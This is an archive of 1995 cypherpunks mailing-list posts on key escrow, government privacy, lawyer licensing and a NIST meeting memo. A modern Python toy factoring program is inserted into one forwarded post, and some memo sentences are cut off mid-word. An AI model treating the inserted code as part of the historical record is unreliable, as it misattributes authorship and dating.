In-Reply-To: <199509131857.OAA08914@panix.com>
Message-ID: <9509132119.AA03389@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Of course, an organized campaign on the Net is essentially free,
| but for the cost in time.  It is my opinion that the political power
| of the Net is just starting to awaken, and that a perception of
| impotence in the political process, is just that - a perception.

	An organized campaign anywhere, for any purpose, is not free,
since it will require good people to run and organize it.  The Key
cracking ring only did what we all knew it could do because Hal, Adam
and several other good folks took the time to do it.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Wed, 13 Sep 95 14:33:33 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509131539.AA17341@cantina.verity.com>
Message-ID: <9509132131.AA03432@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


(Phill Hallam Baker's request that we respect the privacy of
Government employees started this thread)

| > 	Sure.  I'll respect their privacy as much as they, and the
| > organizations they oversee, respect mine.  I'll use as the
| > representative organizations the IRS and the Social Security
| > Administration, which respects my privacy so much that they use
| > prison inmates to process paperwork.
| > 
| > 	If I was in a nasty mood, I'd add the USPS.
| > 
| > 	Sarcasm aside, they show no interest in other people's
| > privacy.  Why should we go out of our way to do anything but show them
| > how bad the situation is?

| Oh please!  Some clerk browses the internet and you don't want to respect
| their privacy because of the IRS?  This makes sense how?  I suppose that
| you're going to dig up information about me and spread it around the 
| internet because you have issues about the company I work for?

	First off, I was being somewhat sarcastic, as you might have
noticed from several things, not the least of which was the phrase
'sarcasm aside.' 

	That said, why should I respect the privacy of government
employees?  There is a substantial difference between government and
private companies, in that I am not compelled in any way to do
business with any private company.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 13 Sep 95 17:05:23 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510103ac7d2135f391@[198.59.115.127]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote,
>But won't clients insist on proper credentials in one form or another?

     Yes.

>Doesn't the practicality and accountability of a centralized authority
>(or several authorities) provide the best answer to this?

     No.

>Who is going
>to accept my signature promising that I did indeed get a law degree and
>pass the bar?

     Very few.

     Certification can be from multiple private and
     government organizations and might vary depending
     on the type of legal service (or other lawyer service)
     needed.  Licensing can only be done by an
     entity that can use physical force to prevent
     buying and selling legal services.


>I don't see how the net will eliminate the basic need for highly
>qualified professionals and the proof that they have credentials.

     It won't.  The needs might shift a little but they
     will be there.

>Perhaps diplomas and such will be transferred into digital signatures for
>the institutions, but I can't see how this "cracks" any "monopoly."
>Perhaps the monopoly is shifted to those who have diplomas, rather than
>those "licensed to practice" but so what?

     It might "crack" government enforced monopoly.
     Should a market monopoly survive some form of
     crypto-anarchy it would be in the form of a
     certification entity that does such a good and
     efficient job that it is very hard to break
     into the business.  Not so bad if it happens,
     but much more honest, efficient and softer-edged
     than "licensed to practice".  I suspect that
     people have needs for varying levels and varying
     specializations so that several kinds of
     certifications may develop and might be supplied
     by multiple entities.

     I suspect that many people would want a
     certification that a lawyer meets the usual
     licensing requirements of the outside world.
     Who knows, maybe that would be the most popular kind.
     But it won't be the only kind.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 15:11:28 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950907233749.7150A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950913180804.6269A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 7 Sep 1995, Duncan Frissell wrote:

> 
> On Thu, 7 Sep 1995, Black Unicorn wrote:
> 
> > > Telecoms will certainly break the professional 
> > > monopoly of lawyers (and other professionals).
> > 
> > This I don't.  How do you mean exactly?
> 
> Licensing requires the ability to outlaw unlicensed transactions.  
> Since the Net trumps censorship and allows consultations at a 
> distance, it cracks licensing,


But won't clients insist on proper credentials in one form or another?  
Doesn't the practicality and accountability of a centralized authority 
(or several authorities) provide the best answer to this?  Who is going 
to accept my signature promising that I did indeed get a law degree and 
pass the bar?

I don't see how the net will eliminate the basic need for highly 
qualified professionals and the proof that they have credentials.  
Perhaps diplomas and such will be transferred into digital signatures for 
the institutions, but I can't see how this "cracks" any "monopoly."  
Perhaps the monopoly is shifted to those who have diplomas, rather than 
those "licensed to practice" but so what?

> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Wed, 13 Sep 95 16:09:12 PDT
To: bdavis@thepoint.net
Subject: CAGK rationale (was: Re: GAK/weak crypto rationale?)
In-Reply-To: <199509132001.NAA02021@comsec.com>
Message-ID: <9509132212.AA28200@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>

>  In our district, we 
>managed to convict almost 20 people in an investigation of the state 
>legislature, including the now-former Speaker of the House and > 6 other 
>legislators.  Bribing lobbyists took hits, etc.
>
>Particularly effective were the court-approved video and audio tapes of 
>the Speaker taking a bribe in exchange for certain action on legislation 
>and responding to the bribing party:   "Well bless your heart."
>That has become the office's mantra.

Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with
all gov't officials forced to use keys held by various newspapers and
other watchdog agencies....

The video and audio bugs aren't part of the wiretap process so they don't
apply here.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 13 Sep 95 15:19:26 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <199509132121.OAA05728@netcom23.netcom.com>
Message-ID: <9509132218.AA25328@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I suspect that a lot of this Foster stuff is going to hit the media big
>time when the mud starts to sling during the presidential election,
>when it really counts. I think that someone is sitting on a lot
>of anti-clinton ammo. the 3rd candidate possibilities are very strong
>in 96, because of all the junk coating the Republicrats and Demopublicans.

I don't think that there will be anything on Foster, if anyone had anything they 
would have used it. All that has come up is that some of Foster's files marked 
secret were placed in a safe after he committed suicide. 

What is going to happen is that a lot of the mud is going to get rebutted, on 
both sides. Take the Hillary Clinton Cattle deals for example, the media claim 
was that Hillary invested $1,000 and made $100,000. This is not true. She was 
asked to put up $1,000 as margin by her broker. Margin is not invested, it is 
simply a down payment on risk capital. Her broker knew that Hillary could cover 
very much more if there was a margin call. Hillary was selling options not 
buying them. In the selling game you have unlimited liability but can only make 
a fixed profit. If you lose selling an option the money is only due at the end 
of the contract. So Hillary did not invest $1000, in fact she invested nothing, 
but she did put up her entire assets as risk capital just as a Lloyds name does 
in the insurance market.

The key question is whether the kooks win and the net just degenerates into 
conspiracy theories and so nobody takes any notice of really heinous stuff or 
whether the net injects some facts into the political debate. The net can be 
used for both allegations and rebuttal. That type of environment would 
constitute a genuine information democracy.


>the Whitehouse web hits are potentially interesting. I agree they
>don't imply any "dissident web monitoring program". the question of
>how high a staffer hit those pages and for what reasons is still
>unanswered.

High ups have better things to do with their time than watch conspiracy 
theorists blather on. Underlings are not net.enabled. 

If you think that's bad check out the Congress, they have a limit on the number 
of Internet enabled staffers per senator and congressbeing. I keep trying to get 
the message across about T3 lines but they don't seem to get the message. 

Ever wondered why these poor folks can't use email for their organisations..?


If you are wondering about the cypherpunkness of all this I think that these 
guys should all be using PGP. I'm very careful to give them the url for the 
European distribution site however :-)

Adam writes:

>	That said, why should I respect the privacy of government
>employees?  There is a substantial difference between government and
>private companies, in that I am not compelled in any way to do
>business with any private company.

Like I have a choice of going to Commonwealth gas or not having any lights in the 
apartment...


	Phill H-B

Not speaking for anyone else.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 18:20:58 PDT
To: cypherpunks@toad.com
Subject: "Who knows this guy?"
Message-ID: <ac7cd13119021004b9e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 AM 9/14/95, don@cs.byu.edu wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Just saw this on Usenet, was wondering who knows this guy. Obviously not
>a cpunk or it would have hit the list right away. Not in the mood to run
>code on my account without knowing that I know what it will do.
>
>
>From: bobs@mathworks.com (Bob Silverman)
>Newsgroups:
>sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithmetic

It's funny, this thing about names and reputations.

You see, I know the name "Bob Silverman," and his company, Mathworks, a
whole lot more than I know the name "don@cs.byu.edu". Mathworks was heavily
in the news last fall during the Pentium debacle (including someone I used
to know from Intel, Cleve Moler).

I've only seen the posts of "don@cs.byu.edu" since 8-29-95, just the last
two weeks. (I don't claim to have a complete archive, as I delete a lot of
stuff. But this is the earliest don@cs.byu.edu post I can find.)

Certainly I am not impugning the reputation of don@cs.byu.edu, just noting
the irony of him asking if anyone knows who Bob Silverman is. Strange
days.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Wed, 13 Sep 95 17:39:41 PDT
To: cypherpunks@toad.com
Subject: Factoring Software (fwd)
Message-ID: <199509140039.SAA00376@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just saw this on Usenet, was wondering who knows this guy. Obviously not
a cpunk or it would have hit the list right away. Not in the mood to run
code on my account without knowing that I know what it will do.


From: bobs@mathworks.com (Bob Silverman)
Newsgroups: sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithmetic
Subject: Factoring Code
Date: 13 Sep 1995 09:22:38 -0400
Organization: The MathWorks, Inc., Natick, MA 01760
Lines: 41
Distribution: inet
Message-ID: <436luu$3lu@puff.mathworks.com>
NNTP-Posting-Host: puff.mathworks.com

Several people have requested factoring code recently. After thinking
about it I have decided to offer a deal.

I do not have the machine resources I once had, and have some numbers
that I would like factored. They are in the 80-90 digit range. My
code will do an 85 digit number in about 500 hours on a single Sparc-10.
The code is perfectly parallelizable, so 40 machines will do 85 digits
overnight.
Run time for QS can vary by a factor of 2.5 depending on how "rich" 
the number being factored is in small quadratic residues.


I will make available my complete Multiple Polynomial Quadratic Sieve
code, along with instructions, to anyone who will factor at least one
of these numbers. This code includes the siever, the code to combine
large primes, the matrix solver (a naive Gaussian elim over GF(2), but
one which solves a 25K x 25K system in 15 min on a single Sparc), and
the code to multiply everything together and find the factors. I will
also throw in a routine which reads the output file and scans for bad
relations. Sometimes, when running on many machines, I/O errors creep
into the output files. A machine can go down when writing a record, or
there can be a network problem etc. I also have a program which
excises bad records in the output files, and one which sets up multiple
sub-directories with the proper data files so one can run in parallel.

Also included is a program which scans the output files in these
multiple sub-directories and counts the number of relations found.
There is also a program to predict (fairly accurately!) how close to
done you are based on output from the counting program.

This code will also include a decent collection of fast, very portable
multiple precision routines.

All this is for the taking if you guarantee to factor just one number for
me.

- -- 
Bob Silverman
The MathWorks Inc.
24 Prime Park Way
Natick, MA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFd5fsLa+QKZS485AQELHAL/QS2LizHGSzT7h3b8cU78GiR9QLoaQ6zf
FEEyt8XRDFqlUe7CKFfDKB1SPPviAZeBPM4XDfswfvfXpKNLamZQUNc7VYgzPIC0
3knFeQf2A/zWuGBZQp/TM0xBcwKW5lW7
=Zyke
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
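
The back end that the forwarded post describes (a Gaussian elimination over GF(2), then multiplying relations together to find the factors), as an added Python sketch that is not Silverman's code and not part of the original message. Relations are found here by plain trial division rather than a multiple-polynomial sieve, and the function names and toy moduli are assumptions chosen for illustration.

```python
"""Toy congruence-of-squares factoring: relations -> GF(2) elimination -> gcd."""
from math import gcd, isqrt


def small_primes(bound):
    """Factor base: all primes <= bound (trial division is fine at toy sizes)."""
    return [p for p in range(2, bound + 1)
            if all(p % q for q in range(2, isqrt(p) + 1))]


def exponent_vector(value, base):
    """Exponents of value over the factor base, or None if value is not smooth."""
    if value == 0:
        return None
    exps = []
    for p in base:
        e = 0
        while value % p == 0:
            value //= p
            e += 1
        exps.append(e)
    return exps if value == 1 else None


def collect_relations(n, base, want):
    """Find x with x*x mod n smooth over the base (stands in for the siever)."""
    rels = []
    for x in range(isqrt(n) + 1, n):
        exps = exponent_vector(x * x % n, base)
        if exps is not None:
            rels.append((x, exps))
            if len(rels) >= want:
                break
    return rels


def find_dependencies(parity_rows):
    """Naive Gaussian elimination over GF(2).

    Each row is an int whose bit j is the parity of prime j's exponent.
    Returns bitmasks naming sets of rows whose XOR is the zero vector.
    """
    pivots = {}  # lowest set bit -> (reduced row, bitmask of rows combined)
    deps = []
    for i, row in enumerate(parity_rows):
        hist = 1 << i
        while row:
            bit = row & -row  # lowest set bit of the current row
            if bit not in pivots:
                pivots[bit] = (row, hist)
                break
            prow, phist = pivots[bit]
            row ^= prow
            hist ^= phist
        else:
            deps.append(hist)  # row reduced to zero: a linear dependency
    return deps


def factor_from_dependency(n, relations, base, dep):
    """Multiply the chosen relations into x^2 = y^2 (mod n); try gcd(x - y, n)."""
    x_prod = 1
    exp_sum = [0] * len(base)
    for i, (x, exps) in enumerate(relations):
        if (dep >> i) & 1:
            x_prod = x_prod * x % n
            exp_sum = [a + b for a, b in zip(exp_sum, exps)]
    y = 1
    for p, e in zip(base, exp_sum):  # every e is even by construction
        y = y * pow(p, e // 2, n) % n
    g = gcd(x_prod - y, n)
    return g if 1 < g < n else None


def factor(n, bound):
    """Return (p, q) with p * q == n, or None if no dependency splits n."""
    base = small_primes(bound)
    relations = collect_relations(n, base, len(base) + 5)
    rows = [sum((e & 1) << j for j, e in enumerate(exps))
            for _, exps in relations]
    for dep in find_dependencies(rows):
        g = factor_from_dependency(n, relations, base, dep)
        if g:
            return tuple(sorted((g, n // g)))
    return None


if __name__ == "__main__":
    print(factor(1649, 7), factor(8051, 13))
```
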




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin C Sweitzer <msew+@andrew.cmu.edu>
Date: Wed, 13 Sep 95 15:53:22 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <9509131434.AA23717@toad.com>
Message-ID: <8kJq22C00awF0=Na15@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from cypherpunks: 13-Sep-95 CYPHERPUNK considered harmful. by
"Peter Trei"@process.com 
>      We call ourselves 'cypherpunks'. While this is derived from the SF
> term 'cyberpunk', consider the image we are creating for ourselves:
>  
>      A 'punk' is a marginalized young adult, one who rejects the norms
> of his or her society, and takes delight in irking those around him with
> his or her rejection. The older of us will think of James Dean in 'Rebel
> Without a Cause', or Brando in 'The Wild One'. Later, you get images
> such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> other icons of the 'punk rock' movement.


Never EVER judge a book by its cover.


People that do usually end up being Joe Sixpacks.  And by being a Joe
Sixpack you don't have that much power in today's society.


Martin S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Sep 95 18:59:19 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509140159.SAA16728@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Wed, 13 Sep 1995, David C. Lambert wrote:
>
>> I propose that we get some likely candidate (actually, a similar candidate
>> to the one above) to advocate the benefits of anonymity on the net.  

Is Wavy Gravy running his "Nobody for President" campaign again this time?
After all, Nobody's going to balance the budget, and Nobody's going to
get the government out of your bedroom, and on the internet, Nobody can tell
if you're a dog or not :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Sep 95 18:59:30 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <199509140159.SAA16796@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This whole flap reminds me of the days it was discovered that
the FBI was buying Usenet access, on tape monthly rather than online.

>(Phill Hallam Baker's request that we respect the privacy of
>Government employees started this thread)

Yup.  It would be nice to know what our employees are doing
with all this fancy equipment we've bought them, but on the other
hand, I'd far rather have them seeing the abuse the net gives
them in person rather than having to have the FBI or some other
filtering bureaucracy explain to them what the net is all about ...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Sep 95 19:00:28 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509140159.SAA16862@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 PM 9/12/95 -0400, Brian Davis wrote:

>> > I don't doubt that wiretaps may sometimes be abused despite the 
>> > incredibly onerous review process, but they have positive aspects, too.
>> 
>> In how many of these cases did you fail to get the necessary information
>> because of encryption?  Has this proportion been changing over the years?
>
>I wasn't personally involved in any of the cases, but I suspect the 
>answer re encryption is zero.  There was the time the FBI agent failed to 
>push the record button, however.
>My response was to the wiretap correlation to career-making cases.  
>I don't believe encryption is widespread enough yet to be a serious problem 
>in the Title III area.  It is a potential problem, though, as encryption 
>(rightfully) spreads.  

You're probably right.  On the other hand, especially as dealers in
politically incorrect substances get better privacy technology,
this will become much more of an issue, and I get the impression from
what I read in the papers that big drug busts, arrests of major
organized crime figures, and the rare terrorist cases are probably
big career wins for the police agents and prosecutors involved.

>The question I am debating with myself, with all 
>of your help, is what the policy "ought to be."

As you might guess, I think the government makes lots of laws about
things that are not their business, and wiretaps and other privacy
invasions are especially useful for prosecuting victimless crimes and 
dissident political groups, since none of the participants call the cops.
On the other hand, I've had friends whose businesses have been burned 
down by the Mafia, and don't like murderers bombing pubs, either,
and stopping people like that is legitimate police business.

However, I think the moral case is very clear that people have the
right to communicate freely and privately, and to use whatever
technology or languages they want to to attempt to do so;
any government that would try to prevent that is more of a threat
to freedom than a benefit.  And police have had a lot of success with
informants, and new technology has really improved equipment for
bugging suspects- if you folks do your jobs honestly and apologize
when you make mistakes about invading incorrect suspects' privacy,
go ahead and use it.

The really gray areas are things like widespread coordinated
surveillance of public activities - cameras in the subways, etc.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 13 Sep 95 19:19:19 PDT
To: cypherpunks, gnu
Subject: Ron Plesser's take on NIST GAK meeting
Message-ID: <9509140219.AA09487@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I converted a document in some proprietary Windows binary format to ASCII.
Formatting mistakes are mine.

Ron Plesser is a very experienced lobbyist.  He was involved in the
passage of the ECPA, among other things.  He's CIX's lawyer, and sent
this document to CIX (the Commercial Internet Exchange), which passed
it on to its membership.

	John Gilmore


PIPER & MARBURY L.L.P.  Memorandum

To:  Interested Parties
From:  Ron Plesser
Date:  September 11, 1995
Subject:  NIST Key Escrow Encryption Meeting

The National Institute of Standards and Technology on September 6 and 7
held a meeting on issues regarding key escrow encryption, focusing on
export criteria for software and desirable characteristics for U.S. key
escrow agents.  Ten draft software key escrow export criteria were put
forth by NIST for consideration and possible revision (see below).  Key
escrow encryption is the recent Administration proposal for an
alternative to Clipper Chip, which industry opposed.  Key escrow would,
in the Administration's view, allow the export of software with strong
encryption.  In summary, the government would permit the general
licensing of 64-bit-key encryption provided that it be manufactured
with a key that would be maintained by independent escrow agents who
were certified by the U.S. government.  Foreign escrow agents could be
used where there was a bi-lateral agreement with the particular country
involved.

NIST Deputy Director Ray Kammer provided an overview of the goals of
the meeting, and said that NIST plans to issue a Federal Register
notice containing a "revised set of thoughts" in three weeks.  There
will be a 60-day comment period following publication of the revised
principles in the Federal Register.  The  NIST will then review the
comments received and determine whether there is enough consensus to
proceed.  There will be additional meetings on September 15, 1995 to
discuss the Federal government's requirements for its own information
processing standards for key escrow encryption.  This meeting will take
place at the Gaithersburg, Maryland Hilton Hotel from 9:00 a.m. to 5:00
p.m.

It was clear from the meeting, both in presentations and conversation
during breaks, that most computer systems and certainly those used by
large entities will have key escrow systems for encryption.  There was
even a person who spoke who said that they are doing this now.  Many
people at the meeting acknowledged that key escrow would be implemented
at some point for domestic as well as for exported programs.  The issue
is who would hold the key.  For example, could a company hold its own
keys or could an independent agent be used?

The people who create mass market software, however, still expressed
significant opposition to key escrow.  While the government went to
some length to express that this solution is neutral as to software or
hardware, it has to be acknowledged that hardware-based systems are
easier to control.

The subject that was not well discussed was encryption in relation to
network services and the internet.  It was discussed in relation to the
issues of interoperability and the ability to decrypt both sides of a
communication.

The assumption that I and others had at the outset was that the
Administration had made progress in the last year in raising itself
from the ashes of Clipper Chip.  By the end of the meeting that was not
altogether clear.  There will remain a great deal of controversy
surrounding this issue.  Congress is sure to get involved and it will
get messier before it gets resolved.

Administration Comments

Mike Nelson, who is special assistant for information technology to the
White House Office of Science and Technology Policy and co-chair of the
inter-agency working group on encryption, provided a historical
overview of the data encryption issue.  He said that the proposed
64-bit-key encryption is 17 million times stronger than the 40-bit-key
encryption currently allowed to be exported.  Under the proposed
policy, software with 64-bit-key encryption could be exported to
friendly countries under certain conditions, all of which require that
a key to that encryption be available in the U.S. from an independent
third-party.  Mr. Nelson stated that the new policy will open up new
market opportunities for the U.S. computer software industry, and that
key escrow has the potential to become a de facto global standard.  The
Administration policy for 40-bit-key encryption will continue as-is,
and no keys will have to be escrowed for such systems.  Mr. Nelson said
that the government's main concern is that strong encr

In response to questioning, Mr. Nelson stated that the 64-bit-key limit
is being imposed because the government is not certain that the key
escrow system will work.  Once the system is up and running, longer
keys may be allowable.  He said that the draft criteria are based on
national security needs, and that they were pushed as far as possible
to meet commercial needs.  Mr. Nelson added that the Administration is
discussing the possibility of federal legislation with Hill staff to
avoid varying state laws on encryption.

Industry Perspectives

General reaction was mixed to the government's proposal.  Most heavy
industrial and commercial users of encryption seemed accepting of the
Administration's position.  To them this meant greater flexibility and
would mean that most larger systems could get export licenses for
64-bit-key systems and this would expand the capacity to sell larger
systems abroad.  This position was exemplified by Trusted Information
Systems (TIS), representatives of which spoke several times.  In a
presentation, Peter Dinsmore of TIS offered restatements of the
criteria to make them more commercially viable, and a set of "criteria
for the criteria," which are as follows:  1) don't specify commercial
criteria, 2) don't exceed the minimum, 3) don't allow criteria creep,
4) don't solve the dual-rogue problem, 5) don't over protect, and 6)
use generic nomenclature.  He recommended that criteria six and nine be
removed altogether, a view that was echoed by other participants.

The mass market software industry and the public interest groups were
very opposed to the Administration proposal.  They do not believe that
64-bit key is sufficient, and they do not believe that anyone will buy
U.S.-manufactured software with a key that is to be held by a third
party under at least some control by the government.  There was a fair
amount of confusion on the issue at the meeting, but it now seems clear
that the government would permit foreign escrow where there are
bi-lateral agreements with friendly nations.  In a presentation, Bob
Holleyman of the Business Software Alliance criticized the
Administration's failure to "liberalize export controls on generally
available software employing non-key escrow encryption."  Also, he
stated that the Administration's proposal and the draft criteria
"continue to reflect a misunderstanding of the market place and, if
implemented in anything like their current form, will prevent key
escrow encryption from ever being commercially adopted."  Mr. Holleyman
r

In addition, the representative of MCI strongly objected to the
proposal as an incursion into the private sector and as an impediment
to the development of a strong information infrastructure.  Encryption
guru Whit Diffie of Sun Micro Systems and others objected to the
proposal.

Danny Weitzner of the Center for Democracy and Technology said that CDT
was going to go to Congress and object to the implementation of this
proposal.  They thought that it was a bad deal and the government
should not be placed in the position of directing standards and
requiring back doors into encryption systems.

Discussion of Criteria Six, Seven and Eight

Following the industry presentations, participants divided into groups
to discuss various criteria.  The group that discussed criteria six,
seven and eight made the following observations and recommendations.

There seemed to be universal objection to criterion six.  This would
limit the interoperability of systems.  It effectively states that
exported 64-bit key cannot be used to decrypt messages that were
encrypted with a higher value.  This would make it very difficult for
U.S. companies to interact with foreign subsidiaries. The internet
would find great difficulty in connection with this criterion.

Regarding criterion seven, concern was raised that in the context of
e-mail, it would be onerous to do key escrow for every transmission.
Concern also was raised about maintaining the integrity of intellectual
property in instances in which the escrow agent is in a foreign
country.  In effect, when one chooses an escrow center, one also is
selecting a legal system.  A request was made for a supplemental
document explaining applicable existing laws.

Concern was raised that all of the criteria are focused on the voice
communication paradigm, rather than on the dynamic data communications
environment.  Laws also are focused on this paradigm, and law moves
slowly whereas computer technology moves rapidly.  In addition, the
criteria do not address varying international laws on issues such as
privacy.  Companies will have to comply with the laws of the strictest
countries.  Concern was raised that privacy considerations are not as
apparent in the criteria as ease of access by law enforcement
agencies.  Also, innocent parties could be de-escrowed.  In addition,
it was emphasized that encryption must not interfere with use of
existing software.  Information was requested on two encryption
schemes, Banker's Trust and Fortress.

It was recommended that the TIS restatement of criterion seven be
adopted.  This restatement is as follows:  "The key escrow mechanism
allows access to both sides of a simultaneous (i.e., two-way)
communication with only access to the decrypting information from one
of the users."  It also was recommended that for bi-directional
communications, both parties negotiate a common key and escrow it, and
that for one way communications, the sender select the escrow key.

Regarding criterion eight, it was agreed that the technology issues,
international issues, and privacy issues are the same as those for
criterion seven.  It was noted that certain implementations would
require escrowing of the session key, which is unrealistic.  It was
agreed that with one court order, law enforcement agencies should have
the ability to decrypt a stream of messages.  However, there must be a
time limit on decryption.  It was agreed that agents should be able to
implement an automated system.

General Review/Comments on All Criteria

Industry and government representatives met less formally with the
objective of reviewing each of the criteria and attempting to reconcile
differences.  However, this did not occur; instead, broader issues were
discussed.  There was a certain amount of tension during this session,
as each side complained that the other did not understand its needs.
Industry members said that it seemed that implementation of the draft
criteria, or a version thereof, is a foregone conclusion on the part of
government, without industry input concerning the entire concept.
Specifically, industry members challenged the 64-bit maximum as being
arbitrary and unnecessary.  They said that although 56-bit encryption
was discussed with government last year, technology moves rapidly, and
now 64 bits are not enough.  A NIST representative countered that the
National Security Agency is "putting a big card on the table" with 64
bits.

Industry members also protested that the criteria do not meet the needs
of the global marketplace.  Consumers will not buy products designed to
meet these criteria because they already have access to 64-bit
encryption with no keys either free or at a low cost.  They argued that
the scope of the criteria (e.g., criterion nine) is broader than the
stated objective of exportability, and requested more information as to
why each criterion is being proposed.  Concern also was raised that
foreign countries with bi-lateral agreements with the U.S. will act
against U.S. key escrow agents.  Also, industry will not know the terms
of these agreements.

Export Procedures

Officials of the Department of State and the Department of Commerce
explained in general terms how this program would work.  Each
application would go first to the State Department for a jurisdictional
certification on technical aspects.  If State were satisfied that the
criteria had been met, then it would certify the application over to
the Commerce Department for general licensing procedures.  There would
also be an escrow package, that would have to be certified.  It was not
clear who would control the certification of escrow agents.

Escrow Agents

The issue of who could be an escrow agent and how they would be
controlled was discussed, but not resolved.  The issues of liability
for wrongful release, the conditions of release, and related questions
were not resolved.  It seemed clear to me that escrow agents would have
to be independent of the user entity.  If this law firm were to use an
encryption package in its London office, the key would have to be
placed with a third party.

Conclusion

While no issues were resolved at the meeting, it provided a valuable
forum for the exchange of ideas between government and industry.  Focus
now turns to Congress, and to the crafting of a constructive response
to the upcoming Federal Register notice.  The Administration seems open
to changes.  The mass market software industry and the public interest
community seem negative.  We will continue to keep you informed.


--- Draft Export Criteria ---
for Software Key Escrow Encryption

Software key escrow encryption products meeting the following criteria
will be granted special export licensing treatment similar to that
afforded other mass-market software products with encryption.

1.      The product will use an unclassified encryption algorithm
(e.g., DES, RC4) with a key length not to exceed 64 bits.

2.      The product shall be designed to prevent multiple encryption
(e.g., triple-DES).

3.      The key required to decrypt each message or file shall be
accessible through a key escrow mechanism in the product, and such keys
will be escrowed during manufacture in accordance with #10.  If such
keys are not escrowed during manufacture, the product shall be
inoperable until the key is escrowed in accordance with #10.

4.      The key escrow mechanism shall be designed to include with each
encrypted message or file, in a format accessible by authorized
